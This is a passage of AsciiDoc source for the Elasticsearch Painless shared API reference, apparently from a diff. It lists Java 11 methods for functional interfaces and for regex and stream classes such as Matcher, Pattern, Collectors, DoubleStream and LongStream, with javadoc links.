ToDoubleBiFunction -* double {java11-javadoc}/java.base/java/util/function/ToDoubleBiFunction.html#applyAsDouble(java.lang.Object,java.lang.Object)[applyAsDouble](def, def) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ToDoubleFunction]] -==== ToDoubleFunction -* double {java11-javadoc}/java.base/java/util/function/ToDoubleFunction.html#applyAsDouble(java.lang.Object)[applyAsDouble](def) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ToIntBiFunction]] -==== ToIntBiFunction -* int {java11-javadoc}/java.base/java/util/function/ToIntBiFunction.html#applyAsInt(java.lang.Object,java.lang.Object)[applyAsInt](def, def) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ToIntFunction]] -==== ToIntFunction -* int {java11-javadoc}/java.base/java/util/function/ToIntFunction.html#applyAsInt(java.lang.Object)[applyAsInt](def) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ToLongBiFunction]] -==== ToLongBiFunction -* long {java11-javadoc}/java.base/java/util/function/ToLongBiFunction.html#applyAsLong(java.lang.Object,java.lang.Object)[applyAsLong](def, def) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ToLongFunction]] -==== ToLongFunction -* long {java11-javadoc}/java.base/java/util/function/ToLongFunction.html#applyAsLong(java.lang.Object)[applyAsLong](def) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-UnaryOperator]] -==== UnaryOperator -* static UnaryOperator {java11-javadoc}/java.base/java/util/function/UnaryOperator.html#identity()[identity]() -* Function {java11-javadoc}/java.base/java/util/function/Function.html#andThen(java.util.function.Function)[andThen](Function) -* def {java11-javadoc}/java.base/java/util/function/Function.html#apply(java.lang.Object)[apply](def) -* Function {java11-javadoc}/java.base/java/util/function/Function.html#compose(java.util.function.Function)[compose](Function) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null 
{java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-shared-java-util-regex"] -=== Shared API for package java.util.regex -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-shared-Matcher]] -==== Matcher -* static null {java11-javadoc}/java.base/java/util/regex/Matcher.html#quoteReplacement(java.lang.String)[quoteReplacement](null) -* int {java11-javadoc}/java.base/java/util/regex/Matcher.html#end()[end]() -* int {java11-javadoc}/java.base/java/util/regex/Matcher.html#end(int)[end](int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/util/regex/Matcher.html#find()[find]() -* boolean {java11-javadoc}/java.base/java/util/regex/Matcher.html#find(int)[find](int) -* null {java11-javadoc}/java.base/java/util/regex/Matcher.html#group()[group]() -* null {java11-javadoc}/java.base/java/util/regex/Matcher.html#group(int)[group](int) -* int {java11-javadoc}/java.base/java/util/regex/Matcher.html#groupCount()[groupCount]() -* boolean {java11-javadoc}/java.base/java/util/regex/Matcher.html#hasAnchoringBounds()[hasAnchoringBounds]() -* boolean {java11-javadoc}/java.base/java/util/regex/Matcher.html#hasTransparentBounds()[hasTransparentBounds]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/regex/Matcher.html#hitEnd()[hitEnd]() -* boolean {java11-javadoc}/java.base/java/util/regex/Matcher.html#lookingAt()[lookingAt]() -* boolean {java11-javadoc}/java.base/java/util/regex/Matcher.html#matches()[matches]() -* null namedGroup(null) -* Pattern {java11-javadoc}/java.base/java/util/regex/Matcher.html#pattern()[pattern]() -* Matcher {java11-javadoc}/java.base/java/util/regex/Matcher.html#region(int,int)[region](int, int) -* int {java11-javadoc}/java.base/java/util/regex/Matcher.html#regionEnd()[regionEnd]() -* int {java11-javadoc}/java.base/java/util/regex/Matcher.html#regionStart()[regionStart]() -* null {java11-javadoc}/java.base/java/util/regex/Matcher.html#replaceAll(java.lang.String)[replaceAll](null) -* null {java11-javadoc}/java.base/java/util/regex/Matcher.html#replaceFirst(java.lang.String)[replaceFirst](null) -* boolean {java11-javadoc}/java.base/java/util/regex/Matcher.html#requireEnd()[requireEnd]() -* Matcher {java11-javadoc}/java.base/java/util/regex/Matcher.html#reset()[reset]() -* int {java11-javadoc}/java.base/java/util/regex/Matcher.html#start()[start]() -* int {java11-javadoc}/java.base/java/util/regex/Matcher.html#start(int)[start](int) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* Matcher {java11-javadoc}/java.base/java/util/regex/Matcher.html#useAnchoringBounds(boolean)[useAnchoringBounds](boolean) -* Matcher {java11-javadoc}/java.base/java/util/regex/Matcher.html#usePattern(java.util.regex.Pattern)[usePattern](Pattern) -* Matcher {java11-javadoc}/java.base/java/util/regex/Matcher.html#useTransparentBounds(boolean)[useTransparentBounds](boolean) - - -[[painless-api-reference-shared-Pattern]] -==== Pattern -* static null {java11-javadoc}/java.base/java/util/regex/Pattern.html#quote(java.lang.String)[quote](null) -* Predicate {java11-javadoc}/java.base/java/util/regex/Pattern.html#asPredicate()[asPredicate]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int 
{java11-javadoc}/java.base/java/util/regex/Pattern.html#flags()[flags]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Matcher {java11-javadoc}/java.base/java/util/regex/Pattern.html#matcher(java.lang.CharSequence)[matcher](CharSequence) -* null {java11-javadoc}/java.base/java/util/regex/Pattern.html#pattern()[pattern]() -* null[] {java11-javadoc}/java.base/java/util/regex/Pattern.html#split(java.lang.CharSequence)[split](CharSequence) -* null[] {java11-javadoc}/java.base/java/util/regex/Pattern.html#split(java.lang.CharSequence,int)[split](CharSequence, int) -* Stream {java11-javadoc}/java.base/java/util/regex/Pattern.html#splitAsStream(java.lang.CharSequence)[splitAsStream](CharSequence) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-shared-java-util-stream"] -=== Shared API for package java.util.stream -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-shared-BaseStream]] -==== BaseStream -* void {java11-javadoc}/java.base/java/util/stream/BaseStream.html#close()[close]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/stream/BaseStream.html#isParallel()[isParallel]() -* Iterator {java11-javadoc}/java.base/java/util/stream/BaseStream.html#iterator()[iterator]() -* BaseStream {java11-javadoc}/java.base/java/util/stream/BaseStream.html#sequential()[sequential]() -* Spliterator {java11-javadoc}/java.base/java/util/stream/BaseStream.html#spliterator()[spliterator]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* BaseStream {java11-javadoc}/java.base/java/util/stream/BaseStream.html#unordered()[unordered]() - - -[[painless-api-reference-shared-Collector]] -==== Collector -* static Collector {java11-javadoc}/java.base/java/util/stream/Collector.html#of(java.util.function.Supplier,java.util.function.BiConsumer,java.util.function.BinaryOperator,java.util.stream.Collector$Characteristics%5B%5D)[of](Supplier, BiConsumer, BinaryOperator, Collector.Characteristics[]) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collector.html#of(java.util.function.Supplier,java.util.function.BiConsumer,java.util.function.BinaryOperator,java.util.function.Function,java.util.stream.Collector$Characteristics%5B%5D)[of](Supplier, BiConsumer, BinaryOperator, Function, Collector.Characteristics[]) -* BiConsumer {java11-javadoc}/java.base/java/util/stream/Collector.html#accumulator()[accumulator]() -* Set {java11-javadoc}/java.base/java/util/stream/Collector.html#characteristics()[characteristics]() -* BinaryOperator {java11-javadoc}/java.base/java/util/stream/Collector.html#combiner()[combiner]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* Function {java11-javadoc}/java.base/java/util/stream/Collector.html#finisher()[finisher]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Supplier {java11-javadoc}/java.base/java/util/stream/Collector.html#supplier()[supplier]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Collector-Characteristics]] -==== Collector.Characteristics -* static Collector.Characteristics 
{java11-javadoc}/java.base/java/util/stream/Collector$Characteristics.html#CONCURRENT[CONCURRENT] -* static Collector.Characteristics {java11-javadoc}/java.base/java/util/stream/Collector$Characteristics.html#IDENTITY_FINISH[IDENTITY_FINISH] -* static Collector.Characteristics {java11-javadoc}/java.base/java/util/stream/Collector$Characteristics.html#UNORDERED[UNORDERED] -* static Collector.Characteristics {java11-javadoc}/java.base/java/util/stream/Collector$Characteristics.html#valueOf(java.lang.String)[valueOf](null) -* static Collector.Characteristics[] {java11-javadoc}/java.base/java/util/stream/Collector$Characteristics.html#values()[values]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Collectors]] -==== Collectors -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#averagingDouble(java.util.function.ToDoubleFunction)[averagingDouble](ToDoubleFunction) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#averagingInt(java.util.function.ToIntFunction)[averagingInt](ToIntFunction) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#averagingLong(java.util.function.ToLongFunction)[averagingLong](ToLongFunction) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#collectingAndThen(java.util.stream.Collector,java.util.function.Function)[collectingAndThen](Collector, Function) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#counting()[counting]() -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#groupingBy(java.util.function.Function)[groupingBy](Function) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#groupingBy(java.util.function.Function,java.util.stream.Collector)[groupingBy](Function, Collector) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#groupingBy(java.util.function.Function,java.util.function.Supplier,java.util.stream.Collector)[groupingBy](Function, Supplier, Collector) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#joining()[joining]() -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#joining(java.lang.CharSequence)[joining](CharSequence) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#joining(java.lang.CharSequence,java.lang.CharSequence,java.lang.CharSequence)[joining](CharSequence, CharSequence, CharSequence) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#mapping(java.util.function.Function,java.util.stream.Collector)[mapping](Function, Collector) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#maxBy(java.util.Comparator)[maxBy](Comparator) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#minBy(java.util.Comparator)[minBy](Comparator) -* static Collector 
{java11-javadoc}/java.base/java/util/stream/Collectors.html#partitioningBy(java.util.function.Predicate)[partitioningBy](Predicate) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#partitioningBy(java.util.function.Predicate,java.util.stream.Collector)[partitioningBy](Predicate, Collector) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#reducing(java.util.function.BinaryOperator)[reducing](BinaryOperator) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#reducing(java.lang.Object,java.util.function.BinaryOperator)[reducing](def, BinaryOperator) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#reducing(java.lang.Object,java.util.function.Function,java.util.function.BinaryOperator)[reducing](def, Function, BinaryOperator) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#summarizingDouble(java.util.function.ToDoubleFunction)[summarizingDouble](ToDoubleFunction) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#summarizingInt(java.util.function.ToIntFunction)[summarizingInt](ToIntFunction) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#summarizingLong(java.util.function.ToLongFunction)[summarizingLong](ToLongFunction) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#summingDouble(java.util.function.ToDoubleFunction)[summingDouble](ToDoubleFunction) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#summingInt(java.util.function.ToIntFunction)[summingInt](ToIntFunction) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#summingLong(java.util.function.ToLongFunction)[summingLong](ToLongFunction) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#toCollection(java.util.function.Supplier)[toCollection](Supplier) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#toList()[toList]() -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#toMap(java.util.function.Function,java.util.function.Function)[toMap](Function, Function) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#toMap(java.util.function.Function,java.util.function.Function,java.util.function.BinaryOperator)[toMap](Function, Function, BinaryOperator) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#toMap(java.util.function.Function,java.util.function.Function,java.util.function.BinaryOperator,java.util.function.Supplier)[toMap](Function, Function, BinaryOperator, Supplier) -* static Collector {java11-javadoc}/java.base/java/util/stream/Collectors.html#toSet()[toSet]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DoubleStream]] -==== DoubleStream -* static DoubleStream.Builder {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#builder()[builder]() -* static DoubleStream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#concat(java.util.stream.DoubleStream,java.util.stream.DoubleStream)[concat](DoubleStream, DoubleStream) -* static DoubleStream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#empty()[empty]() -* 
static DoubleStream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#of(double%5B%5D)[of](double[]) -* boolean {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#allMatch(java.util.function.DoublePredicate)[allMatch](DoublePredicate) -* boolean {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#anyMatch(java.util.function.DoublePredicate)[anyMatch](DoublePredicate) -* OptionalDouble {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#average()[average]() -* Stream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#boxed()[boxed]() -* void {java11-javadoc}/java.base/java/util/stream/BaseStream.html#close()[close]() -* def {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#collect(java.util.function.Supplier,java.util.function.ObjDoubleConsumer,java.util.function.BiConsumer)[collect](Supplier, ObjDoubleConsumer, BiConsumer) -* long {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#count()[count]() -* DoubleStream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#distinct()[distinct]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* DoubleStream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#filter(java.util.function.DoublePredicate)[filter](DoublePredicate) -* OptionalDouble {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#findAny()[findAny]() -* OptionalDouble {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#findFirst()[findFirst]() -* DoubleStream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#flatMap(java.util.function.DoubleFunction)[flatMap](DoubleFunction) -* void {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#forEach(java.util.function.DoubleConsumer)[forEach](DoubleConsumer) -* void {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#forEachOrdered(java.util.function.DoubleConsumer)[forEachOrdered](DoubleConsumer) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/stream/BaseStream.html#isParallel()[isParallel]() -* PrimitiveIterator.OfDouble {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#iterator()[iterator]() -* DoubleStream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#limit(long)[limit](long) -* DoubleStream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#map(java.util.function.DoubleUnaryOperator)[map](DoubleUnaryOperator) -* IntStream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#mapToInt(java.util.function.DoubleToIntFunction)[mapToInt](DoubleToIntFunction) -* LongStream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#mapToLong(java.util.function.DoubleToLongFunction)[mapToLong](DoubleToLongFunction) -* Stream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#mapToObj(java.util.function.DoubleFunction)[mapToObj](DoubleFunction) -* OptionalDouble {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#max()[max]() -* OptionalDouble {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#min()[min]() -* boolean {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#noneMatch(java.util.function.DoublePredicate)[noneMatch](DoublePredicate) -* DoubleStream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#peek(java.util.function.DoubleConsumer)[peek](DoubleConsumer) -* OptionalDouble 
{java11-javadoc}/java.base/java/util/stream/DoubleStream.html#reduce(java.util.function.DoubleBinaryOperator)[reduce](DoubleBinaryOperator) -* double {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#reduce(double,java.util.function.DoubleBinaryOperator)[reduce](double, DoubleBinaryOperator) -* DoubleStream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#sequential()[sequential]() -* DoubleStream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#skip(long)[skip](long) -* DoubleStream {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#sorted()[sorted]() -* Spliterator.OfDouble {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#spliterator()[spliterator]() -* double {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#sum()[sum]() -* DoubleSummaryStatistics {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#summaryStatistics()[summaryStatistics]() -* double[] {java11-javadoc}/java.base/java/util/stream/DoubleStream.html#toArray()[toArray]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* BaseStream {java11-javadoc}/java.base/java/util/stream/BaseStream.html#unordered()[unordered]() - - -[[painless-api-reference-shared-DoubleStream-Builder]] -==== DoubleStream.Builder -* void {java11-javadoc}/java.base/java/util/function/DoubleConsumer.html#accept(double)[accept](double) -* DoubleStream.Builder {java11-javadoc}/java.base/java/util/stream/DoubleStream$Builder.html#add(double)[add](double) -* DoubleConsumer {java11-javadoc}/java.base/java/util/function/DoubleConsumer.html#andThen(java.util.function.DoubleConsumer)[andThen](DoubleConsumer) -* DoubleStream {java11-javadoc}/java.base/java/util/stream/DoubleStream$Builder.html#build()[build]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IntStream]] -==== IntStream -* static IntStream.Builder {java11-javadoc}/java.base/java/util/stream/IntStream.html#builder()[builder]() -* static IntStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#concat(java.util.stream.IntStream,java.util.stream.IntStream)[concat](IntStream, IntStream) -* static IntStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#empty()[empty]() -* static IntStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#of(int%5B%5D)[of](int[]) -* static IntStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#range(int,int)[range](int, int) -* static IntStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#rangeClosed(int,int)[rangeClosed](int, int) -* boolean {java11-javadoc}/java.base/java/util/stream/IntStream.html#allMatch(java.util.function.IntPredicate)[allMatch](IntPredicate) -* boolean {java11-javadoc}/java.base/java/util/stream/IntStream.html#anyMatch(java.util.function.IntPredicate)[anyMatch](IntPredicate) -* DoubleStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#asDoubleStream()[asDoubleStream]() -* LongStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#asLongStream()[asLongStream]() -* OptionalDouble {java11-javadoc}/java.base/java/util/stream/IntStream.html#average()[average]() -* Stream {java11-javadoc}/java.base/java/util/stream/IntStream.html#boxed()[boxed]() -* void 
{java11-javadoc}/java.base/java/util/stream/BaseStream.html#close()[close]() -* def {java11-javadoc}/java.base/java/util/stream/IntStream.html#collect(java.util.function.Supplier,java.util.function.ObjIntConsumer,java.util.function.BiConsumer)[collect](Supplier, ObjIntConsumer, BiConsumer) -* long {java11-javadoc}/java.base/java/util/stream/IntStream.html#count()[count]() -* IntStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#distinct()[distinct]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* IntStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#filter(java.util.function.IntPredicate)[filter](IntPredicate) -* OptionalInt {java11-javadoc}/java.base/java/util/stream/IntStream.html#findAny()[findAny]() -* OptionalInt {java11-javadoc}/java.base/java/util/stream/IntStream.html#findFirst()[findFirst]() -* IntStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#flatMap(java.util.function.IntFunction)[flatMap](IntFunction) -* void {java11-javadoc}/java.base/java/util/stream/IntStream.html#forEach(java.util.function.IntConsumer)[forEach](IntConsumer) -* void {java11-javadoc}/java.base/java/util/stream/IntStream.html#forEachOrdered(java.util.function.IntConsumer)[forEachOrdered](IntConsumer) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/stream/BaseStream.html#isParallel()[isParallel]() -* PrimitiveIterator.OfInt {java11-javadoc}/java.base/java/util/stream/IntStream.html#iterator()[iterator]() -* IntStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#limit(long)[limit](long) -* IntStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#map(java.util.function.IntUnaryOperator)[map](IntUnaryOperator) -* DoubleStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#mapToDouble(java.util.function.IntToDoubleFunction)[mapToDouble](IntToDoubleFunction) -* LongStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#mapToLong(java.util.function.IntToLongFunction)[mapToLong](IntToLongFunction) -* Stream {java11-javadoc}/java.base/java/util/stream/IntStream.html#mapToObj(java.util.function.IntFunction)[mapToObj](IntFunction) -* OptionalInt {java11-javadoc}/java.base/java/util/stream/IntStream.html#max()[max]() -* OptionalInt {java11-javadoc}/java.base/java/util/stream/IntStream.html#min()[min]() -* boolean {java11-javadoc}/java.base/java/util/stream/IntStream.html#noneMatch(java.util.function.IntPredicate)[noneMatch](IntPredicate) -* IntStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#peek(java.util.function.IntConsumer)[peek](IntConsumer) -* OptionalInt {java11-javadoc}/java.base/java/util/stream/IntStream.html#reduce(java.util.function.IntBinaryOperator)[reduce](IntBinaryOperator) -* int {java11-javadoc}/java.base/java/util/stream/IntStream.html#reduce(int,java.util.function.IntBinaryOperator)[reduce](int, IntBinaryOperator) -* IntStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#sequential()[sequential]() -* IntStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#skip(long)[skip](long) -* IntStream {java11-javadoc}/java.base/java/util/stream/IntStream.html#sorted()[sorted]() -* Spliterator.OfInt {java11-javadoc}/java.base/java/util/stream/IntStream.html#spliterator()[spliterator]() -* int {java11-javadoc}/java.base/java/util/stream/IntStream.html#sum()[sum]() -* IntSummaryStatistics 
{java11-javadoc}/java.base/java/util/stream/IntStream.html#summaryStatistics()[summaryStatistics]() -* int[] {java11-javadoc}/java.base/java/util/stream/IntStream.html#toArray()[toArray]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* BaseStream {java11-javadoc}/java.base/java/util/stream/BaseStream.html#unordered()[unordered]() - - -[[painless-api-reference-shared-IntStream-Builder]] -==== IntStream.Builder -* void {java11-javadoc}/java.base/java/util/function/IntConsumer.html#accept(int)[accept](int) -* IntStream.Builder {java11-javadoc}/java.base/java/util/stream/IntStream$Builder.html#add(int)[add](int) -* IntConsumer {java11-javadoc}/java.base/java/util/function/IntConsumer.html#andThen(java.util.function.IntConsumer)[andThen](IntConsumer) -* IntStream {java11-javadoc}/java.base/java/util/stream/IntStream$Builder.html#build()[build]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-LongStream]] -==== LongStream -* static LongStream.Builder {java11-javadoc}/java.base/java/util/stream/LongStream.html#builder()[builder]() -* static LongStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#concat(java.util.stream.LongStream,java.util.stream.LongStream)[concat](LongStream, LongStream) -* static LongStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#empty()[empty]() -* static LongStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#of(long%5B%5D)[of](long[]) -* static LongStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#range(long,long)[range](long, long) -* static LongStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#rangeClosed(long,long)[rangeClosed](long, long) -* boolean {java11-javadoc}/java.base/java/util/stream/LongStream.html#allMatch(java.util.function.LongPredicate)[allMatch](LongPredicate) -* boolean {java11-javadoc}/java.base/java/util/stream/LongStream.html#anyMatch(java.util.function.LongPredicate)[anyMatch](LongPredicate) -* DoubleStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#asDoubleStream()[asDoubleStream]() -* OptionalDouble {java11-javadoc}/java.base/java/util/stream/LongStream.html#average()[average]() -* Stream {java11-javadoc}/java.base/java/util/stream/LongStream.html#boxed()[boxed]() -* void {java11-javadoc}/java.base/java/util/stream/BaseStream.html#close()[close]() -* def {java11-javadoc}/java.base/java/util/stream/LongStream.html#collect(java.util.function.Supplier,java.util.function.ObjLongConsumer,java.util.function.BiConsumer)[collect](Supplier, ObjLongConsumer, BiConsumer) -* long {java11-javadoc}/java.base/java/util/stream/LongStream.html#count()[count]() -* LongStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#distinct()[distinct]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* LongStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#filter(java.util.function.LongPredicate)[filter](LongPredicate) -* OptionalLong {java11-javadoc}/java.base/java/util/stream/LongStream.html#findAny()[findAny]() -* OptionalLong {java11-javadoc}/java.base/java/util/stream/LongStream.html#findFirst()[findFirst]() -* LongStream 
{java11-javadoc}/java.base/java/util/stream/LongStream.html#flatMap(java.util.function.LongFunction)[flatMap](LongFunction) -* void {java11-javadoc}/java.base/java/util/stream/LongStream.html#forEach(java.util.function.LongConsumer)[forEach](LongConsumer) -* void {java11-javadoc}/java.base/java/util/stream/LongStream.html#forEachOrdered(java.util.function.LongConsumer)[forEachOrdered](LongConsumer) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/stream/BaseStream.html#isParallel()[isParallel]() -* PrimitiveIterator.OfLong {java11-javadoc}/java.base/java/util/stream/LongStream.html#iterator()[iterator]() -* LongStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#limit(long)[limit](long) -* LongStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#map(java.util.function.LongUnaryOperator)[map](LongUnaryOperator) -* DoubleStream {java11-javadoc}/java.base/java/util/stream/LongStream.html#mapToDouble(java.util.function.LongToDoubleFunction)[mapToDouble](LongToDoubleFunction) -* IntStream 